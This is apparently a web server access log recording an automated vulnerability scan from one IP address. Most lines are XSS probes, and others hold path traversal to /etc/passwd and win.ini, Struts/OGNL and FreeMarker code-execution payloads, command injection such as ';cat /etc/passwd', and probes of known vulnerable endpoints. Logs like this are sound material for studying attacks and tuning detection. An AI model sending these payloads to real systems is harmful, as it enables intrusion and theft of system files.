195.164.49.69 - - [18/Nov/2024:21:33:27 +0000] GET /?i=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-i%27%29%3E&database=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-database%27%29%3E&tax_input=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tax_input%27%29%3E&secret=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-secret%27%29%3E&mod=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-mod%27%29%3E&s=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-s%27%29%3E&stage=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-stage%27%29%3E&time=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-time%27%29%3E&new=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-new%27%29%3E&api_key=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-api_key%27%29%3E&invalid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-invalid%27%29%3E&db=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-db%27%29%3E&upload=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-upload%27%29%3E&tablename=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tablename%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:21:33:27 +0000] GET /?subject=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-subject%27%29%3E&sticky=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-sticky%27%29%3E&ns=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-ns%27%29%3E&history=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-history%27%29%3E&category_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-category_id%27%29%3E&metakeyselect=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-metakeyselect%27%29%3E©=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-copy%27%29%3E&product_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-product_id%27%29%3E&status=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-status%27%29%3E&cat=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-cat%27%29%3E&list=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-list%27%29%3E&val=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-val%27%29%3E&what=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-what%27%29%3E&group_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-group_id%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:21:33:27 +0000] GET /?attachment=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-attachment%27%29%3E&dbname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-dbname%27%29%3E&rows=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-rows%27%29%3E&parent_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-parent_id%27%29%3E&lang=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-lang%27%29%3E&fid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-fid%27%29%3E&text=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-text%27%29%3E&link=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-link%27%29%3E&timeout=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-timeout%27%29%3E&db_name=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-db_name%27%29%3E&ids=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-ids%27%29%3E&w=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-w%27%29%3E&provider=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-provider%27%29%3E&plugin_status=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-plugin_status%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:21:33:27 +0000] GET /?sort=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-sort%27%29%3E&msg=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-msg%27%29%3E&hostname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-hostname%27%29%3E&directory=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-directory%27%29%3E&disabled=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-disabled%27%29%3E&last_name=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-last_name%27%29%3E&oauth_token=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-oauth_token%27%29%3E&first_name=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-first_name%27%29%3E&delete_widget=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-delete_widget%27%29%3E&md5=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-md5%27%29%3E&selection=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-selection%27%29%3E&filename=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-filename%27%29%3E&address=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-address%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:21:33:27 +0000] GET /?ajax=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-ajax%27%29%3E&timezone_string=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-timezone_string%27%29%3E&group=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-group%27%29%3E&update=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-update%27%29%3E&revision=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-revision%27%29%3E&referer=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-referer%27%29%3E&index=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-index%27%29%3E&src=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-src%27%29%3E&end_date=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-end_date%27%29%3E&gmt_offset=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-gmt_offset%27%29%3E¶ms=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-params%27%29%3E&html=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-html%27%29%3E&pass=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-pass%27%29%3E&offset=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-offset%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:21:33:27 +0000] GET /?image=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-image%27%29%3E&id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-id%27%29%3E&order=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-order%27%29%3E&sid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-sid%27%29%3E&language=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-language%27%29%3E&filter=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-filter%27%29%3E&import=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-import%27%29%3E&st=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-st%27%29%3E&act=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-act%27%29%3E&object=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-object%27%29%3E&insert=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-insert%27%29%3E&task=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-task%27%29%3E&dismiss=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-dismiss%27%29%3E&orderby=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-orderby%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:21:33:27 +0000] GET /?up=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-up%27%29%3E&body=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-body%27%29%3E&return=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-return%27%29%3E&end=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-end%27%29%3E&n=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-n%27%29%3E&opt=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-opt%27%29%3E&source=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-source%27%29%3E&y=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-y%27%29%3E&parent=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-parent%27%29%3E&reason=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-reason%27%29%3E&meta=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-meta%27%29%3E&pass1=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-pass1%27%29%3E&blog=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-blog%27%29%3E&plugin=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-plugin%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:21:33:28 +0000] GET /?option=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-option%27%29%3E&server=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-server%27%29%3E&admin=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-admin%27%29%3E&create=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-create%27%29%3E&template=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-template%27%29%3E&number=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-number%27%29%3E&lastname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-lastname%27%29%3E&multi_number=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-multi_number%27%29%3E&size=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-size%27%29%3E&tax=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tax%27%29%3E&sql=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-sql%27%29%3E&show_sticky=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-show_sticky%27%29%3E&attachments=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-attachments%27%29%3E&_method=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-_method%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:21:33:28 +0000] GET /?taxonomy=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-taxonomy%27%29%3E&tables=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tables%27%29%3E&confirm=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-confirm%27%29%3E&db_port=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-db_port%27%29%3E&op=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-op%27%29%3E&untrashed=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-untrashed%27%29%3E&tid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tid%27%29%3E&flag=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-flag%27%29%3E&stylesheet=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-stylesheet%27%29%3E&download=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-download%27%29%3E&comment_status=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-comment_status%27%29%3E&_wpnonce=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-_wpnonce%27%29%3E&metakeyinput=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-metakeyinput%27%29%3E&remove=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-remove%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:21:33:28 +0000] GET /?deleted=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-deleted%27%29%3E&search=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-search%27%29%3E&action=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-action%27%29%3E&newname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-newname%27%29%3E&info=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-info%27%29%3E&content=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-content%27%29%3E&signature=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-signature%27%29%3E&noconfirmation=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-noconfirmation%27%29%3E&field=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-field%27%29%3E&output=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-output%27%29%3E&city=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-city%27%29%3E&rename=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-rename%27%29%3E&mail=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-mail%27%29%3E&term=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-term%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:21:34:06 +0000] GET / HTTP/1.1 200 11204
- - - [18/Nov/2024:21:34:08 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [18/Nov/2024:21:34:11 +0000] GET /..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development HTTP/1.1 404 1187
- - - [18/Nov/2024:21:34:13 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [18/Nov/2024:21:34:15 +0000] POST /setup/setupadministrator.action HTTP/1.1 404 1109
195.164.49.69 - - [18/Nov/2024:21:34:17 +0000] GET /RestAPI/ImportTechnicians HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:21:34:19 +0000] GET /apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php/fQvq.css HTTP/1.1 404 1178
195.164.49.69 - - [18/Nov/2024:21:34:21 +0000] GET /passwordrecovered.cgi?id=B9SEr HTTP/1.1 404 1095
195.164.49.69 - - [18/Nov/2024:21:35:19 +0000] POST /Token HTTP/1.1 404 1079
195.164.49.69 - - [18/Nov/2024:21:35:21 +0000] GET /metrics HTTP/1.1 404 1081
195.164.49.69 - - [18/Nov/2024:21:35:23 +0000] POST /app HTTP/1.1 404 1077
195.164.49.69 - - [18/Nov/2024:21:35:25 +0000] GET /NON_EXISTING_PATH/ HTTP/1.1 404 1096
195.164.49.69 - - [18/Nov/2024:21:35:26 +0000] POST /NmConsole/Platform/PerformanceMonitorErrors/HasErrors HTTP/1.1 404 1139
195.164.49.69 - - [18/Nov/2024:21:35:28 +0000] GET /sslmgr HTTP/1.1 404 1080
195.164.49.69 - - [18/Nov/2024:21:35:30 +0000] GET /cgi-bin/config.exp HTTP/1.1 404 1096
195.164.49.69 - - [18/Nov/2024:21:35:36 +0000] POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1 404 1120
195.164.49.69 - - [18/Nov/2024:21:35:37 +0000] GET /?id=%25%7B%28%23instancemanager%3D%23application%5B%22org.apache.tomcat.InstanceManager%22%5D%29.%28%23stack%3D%23attr%5B%22com.opensymphony.xwork2.util.ValueStack.ValueStack%22%5D%29.%28%23bean%3D%23instancemanager.newInstance%28%22org.apache.commons.collections.BeanMap%22%29%29.%28%23bean.setBean%28%23stack%29%29.%28%23context%3D%23bean.get%28%22context%22%29%29.%28%23bean.setBean%28%23context%29%29.%28%23macc%3D%23bean.get%28%22memberAccess%22%29%29.%28%23bean.setBean%28%23macc%29%29.%28%23emptyset%3D%23instancemanager.newInstance%28%22java.util.HashSet%22%29%29.%28%23bean.put%28%22excludedClasses%22%2C%23emptyset%29%29.%28%23bean.put%28%22excludedPackageNames%22%2C%23emptyset%29%29.%28%23arglist%3D%23instancemanager.newInstance%28%22java.util.ArrayList%22%29%29.%28%23arglist.add%28%22cat+%2Fetc%2Fpasswd%22%29%29.%28%23execute%3D%23instancemanager.newInstance%28%22freemarker.template.utility.Execute%22%29%29.%28%23execute.exec%28%23arglist%29%29%7D HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:21:35:42 +0000] GET /?widget=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-widget%27%29%3E&height=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-height%27%29%3E&screen=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-screen%27%29%3E&pass2=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-pass2%27%29%3E&redirect_to=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-redirect_to%27%29%3E&items=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-items%27%29%3E&string=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-string%27%29%3E&hidden=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-hidden%27%29%3E&f=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-f%27%29%3E&step=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-step%27%29%3E&role=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-role%27%29%3E&preview_nonce=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-preview_nonce%27%29%3E&date=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-date%27%29%3E&event=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-event%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:21:35:42 +0000] GET /?num=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-num%27%29%3E&drop=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-drop%27%29%3E&g-recaptcha-response=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-g-recaptcha-response%27%29%3E&field_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-field_id%27%29%3E&user_email=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-user_email%27%29%3E&alias=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-alias%27%29%3E&ref=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-ref%27%29%3E&save=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-save%27%29%3E&enabled=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-enabled%27%29%3E&year=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-year%27%29%3E&checked=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-checked%27%29%3E&post_ID=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post_ID%27%29%3E&files=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-files%27%29%3E&text-color=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-text-color%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:21:35:43 +0000] GET /?admin_email=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-admin_email%27%29%3E&code=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-code%27%29%3E&dump=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-dump%27%29%3E&item=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-item%27%29%3E&timezone=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-timezone%27%29%3E&blog_public=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-blog_public%27%29%3E&add=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-add%27%29%3E&enable=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-enable%27%29%3E&customized=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-customized%27%29%3E&admin_password=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-admin_password%27%29%3E&keywords=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-keywords%27%29%3E×tamp=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-timestamp%27%29%3E&label=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-label%27%29%3E&g=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-g%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:21:35:43 +0000] GET /?location=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-location%27%29%3E&link_url=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-link_url%27%29%3E&post_mime_type=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post_mime_type%27%29%3E&uid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-uid%27%29%3E&host=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-host%27%29%3E&cmd=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-cmd%27%29%3E&link_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-link_id%27%29%3E&reset=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-reset%27%29%3E&nonce=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-nonce%27%29%3E&username=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-username%27%29%3E&site=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-site%27%29%3E&do=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-do%27%29%3E&email=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-email%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:21:35:49 +0000] GET /cgi-bin/status HTTP/1.1 404 1092
83.212.98.101 - - [18/Nov/2024:21:35:51 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
195.164.49.69 - - [18/Nov/2024:21:35:51 +0000] GET /api/v1/totp/user-backup-code/../../system/system-information HTTP/1.1 404 1162
195.164.49.69 - - [18/Nov/2024:21:35:54 +0000] GET /core HTTP/1.1 404 1078
195.164.49.69 - - [18/Nov/2024:21:35:56 +0000] GET /cgi-bin/weblogin.cgi?username=admin';cat+/etc/passwd HTTP/1.1 404 1098
195.164.49.69 - - [18/Nov/2024:21:35:58 +0000] POST /dologin.action HTTP/1.1 404 1088
195.164.49.69 - - [18/Nov/2024:21:36:00 +0000] GET /premise/front/getPingData?url=http://0.0.0.0:9600/sm/api/v1/firewall/zone/services?zone=;/usr/bin/id; HTTP/1.1 404 1107
195.164.49.69 - - [18/Nov/2024:21:36:02 +0000] GET /threaddump HTTP/1.1 404 1084
195.164.49.69 - - [18/Nov/2024:21:36:04 +0000] GET /owncloud/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php/yHnW.css HTTP/1.1 404 1191
195.164.49.69 - - [18/Nov/2024:21:36:06 +0000] GET /ACSServer/DownloadFileServlet?show_file_name=../../../../../../etc/passwd&type=uploadfile&path=anything HTTP/1.1 404 1107
195.164.49.69 - - [18/Nov/2024:21:37:04 +0000] GET /api/metrics HTTP/1.1 404 1089
195.164.49.69 - - [18/Nov/2024:21:37:07 +0000] POST /app HTTP/1.1 404 1077
195.164.49.69 - - [18/Nov/2024:21:37:09 +0000] GET /NmConsole/Platform/Filter/AlertCenterItemsReportThresholds HTTP/1.1 404 1144
195.164.49.69 - - [18/Nov/2024:21:37:10 +0000] GET /www/setup.php HTTP/1.1 404 1091
195.164.49.69 - - [18/Nov/2024:21:37:13 +0000] GET /.DS_Store HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:21:37:15 +0000] GET / HTTP/1.1 200 11204
127.0.0.1 - - [18/Nov/2024:21:37:17 +0000] GET /server-status HTTP/1.1 404 1087
195.164.49.69 - - [18/Nov/2024:21:37:19 +0000] GET /dump HTTP/1.1 404 1078
195.164.49.69 - - [18/Nov/2024:21:37:20 +0000] POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1 404 1120
195.164.49.69 - - [18/Nov/2024:21:37:21 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:21:37:23 +0000] GET /env HTTP/1.1 404 1077
195.164.49.69 - - [18/Nov/2024:21:37:26 +0000] GET /logfile HTTP/1.1 404 1081
195.164.49.69 - - [18/Nov/2024:21:37:28 +0000] GET /cgi-bin/stats HTTP/1.1 404 1091
195.164.49.69 - - [18/Nov/2024:21:37:30 +0000] GET /trace HTTP/1.1 404 1079
195.164.49.69 - - [18/Nov/2024:21:37:32 +0000] GET /%61%27%22%3e%3c%69%6e%6a%65%63%74%61%62%6c%65%3e HTTP/1.1 404 1122
195.164.49.69 - - [18/Nov/2024:21:37:34 +0000] GET /access/set?param=enableapi&value=1 HTTP/1.1 404 1088
195.164.49.69 - - [18/Nov/2024:21:37:35 +0000] GET /ftpsync.settings HTTP/1.1 404 1090
195.164.49.69 - - [18/Nov/2024:21:37:37 +0000] GET /welcome.action HTTP/1.1 404 1088
195.164.49.69 - - [18/Nov/2024:21:37:39 +0000] GET /s/2p2XEtAOAfpITCVVaLi1KKNH39u/_/;/WEB-INF/web.xml HTTP/1.1 404 1143
83.212.98.101 - - [18/Nov/2024:21:37:39 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
195.164.49.69 - - [18/Nov/2024:21:37:41 +0000] GET /actuator/threaddump HTTP/1.1 404 1097
195.164.49.69 - - [18/Nov/2024:21:37:43 +0000] GET /catalog-portal/ui/oauth/verify?error&deviceUdid=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%68%6f%73%74%73%22%29%7d HTTP/1.1 404 1116
195.164.49.69 - - [18/Nov/2024:21:37:45 +0000] GET /ACSServer/DownloadFileServlet?show_file_name=../../../../../../windows/win.ini&type=uploadfile&path=anything HTTP/1.1 404 1107
195.164.49.69 - - [18/Nov/2024:21:38:43 +0000] GET /module/api.php?mobile/webNasIPS HTTP/1.1 404 1092
195.164.49.69 - - [18/Nov/2024:21:38:45 +0000] GET /cgi-bin/login_mgr.cgi?C1=ON&cmd=login&f_type=1&f_username=admin&port=80%7Cpwd%26id&pre_pwd=1&pwd=%20&ssl=1&ssl_port=1&username HTTP/1.1 404 1099
195.164.49.69 - - [18/Nov/2024:21:38:46 +0000] POST /app HTTP/1.1 404 1077
195.164.49.69 - - [18/Nov/2024:21:38:48 +0000] GET /dompdf/dompdf/www/setup.php HTTP/1.1 404 1113
195.164.49.69 - - [18/Nov/2024:21:38:50 +0000] GET /api/experimental/latest_runs HTTP/1.1 404 1110
195.164.49.69 - - [18/Nov/2024:21:38:52 +0000] GET /users/sign_in HTTP/1.1 404 1091
195.164.49.69 - - [18/Nov/2024:21:38:54 +0000] GET /zabbix/index_sso.php HTTP/1.1 404 1098
195.164.49.69 - - [18/Nov/2024:21:38:56 +0000] GET /photo/combine.php?type=javascript&g=core-r7rules/../../../hello.php. HTTP/1.1 404 1095
195.164.49.69 - - [18/Nov/2024:21:38:58 +0000] GET /mifs/asfV3/api/v2/admins/users HTTP/1.1 404 1124
195.164.49.69 - - [18/Nov/2024:21:38:59 +0000] GET /actuator/dump HTTP/1.1 404 1091
195.164.49.69 - - [18/Nov/2024:21:39:01 +0000] GET /SetupWizard.aspx/oDXTUiwIDJ HTTP/1.1 404 1105
195.164.49.69 - - [18/Nov/2024:21:39:03 +0000] GET /actuator/env HTTP/1.1 404 1090
195.164.49.69 - - [18/Nov/2024:21:39:05 +0000] GET /wp-admin/admin-ajax.php?action=duplicator_download&file=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 404 1101
195.164.49.69 - - [18/Nov/2024:21:39:07 +0000] GET /actuator/logfile HTTP/1.1 404 1094
195.164.49.69 - - [18/Nov/2024:21:39:09 +0000] GET /cgi-bin/test HTTP/1.1 404 1090
195.164.49.69 - - [18/Nov/2024:21:39:11 +0000] GET /s/2p2XEy1YdJINMD0O4PmVusNI8eK/_/;/WEB-INF/web.xml HTTP/1.1 404 1143
195.164.49.69 - - [18/Nov/2024:21:39:13 +0000] GET /cgi-bin/;cat$IFS/etc/passwd HTTP/1.1 404 1113
195.164.49.69 - - [18/Nov/2024:21:39:15 +0000] GET /ACSServer/WebServlet?act=getMapImg_acs2&filename=../../../../../../../etc/passwd HTTP/1.1 404 1098
195.164.49.69 - - [18/Nov/2024:21:39:16 +0000] GET /zabbix/setup.php HTTP/1.1 404 1094
195.164.49.69 - - [18/Nov/2024:21:39:18 +0000] GET //CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx HTTP/1.1 404 1121
195.164.49.69 - - [18/Nov/2024:21:39:20 +0000] GET /_profiler/phpinfo?+--env=dev HTTP/1.1 404 1095
195.164.49.69 - - [18/Nov/2024:21:39:22 +0000] GET /OS/startup/restore/restoreAdmin.php HTTP/1.1 404 1121
195.164.49.69 - - [18/Nov/2024:21:39:24 +0000] GET /login/../../../etc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [18/Nov/2024:21:39:26 +0000] GET /openam/oauth2/..;/ccversion/Version HTTP/1.1 404 1125
195.164.49.69 - - [18/Nov/2024:21:40:24 +0000] GET /wp-content/plugins/give/readme.txt HTTP/1.1 404 1120
195.164.49.69 - - [18/Nov/2024:21:40:26 +0000] GET /..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fwin.ini HTTP/1.1 400 1169
195.164.49.69 - - [18/Nov/2024:21:40:27 +0000] GET /app?service=page/PrinterList HTTP/1.1 404 1077
195.164.49.69 - - [18/Nov/2024:21:40:29 +0000] GET /js/dompdf/www/setup.php HTTP/1.1 404 1109
195.164.49.69 - - [18/Nov/2024:21:40:31 +0000] GET /web.config.i18n.ashx?l=nycmn&v=nycmn HTTP/1.1 404 1094
195.164.49.69 - - [18/Nov/2024:21:40:33 +0000] GET /.mysql_history HTTP/1.1 404 1088
195.164.49.69 - - [18/Nov/2024:21:40:35 +0000] GET /index_sso.php HTTP/1.1 404 1087
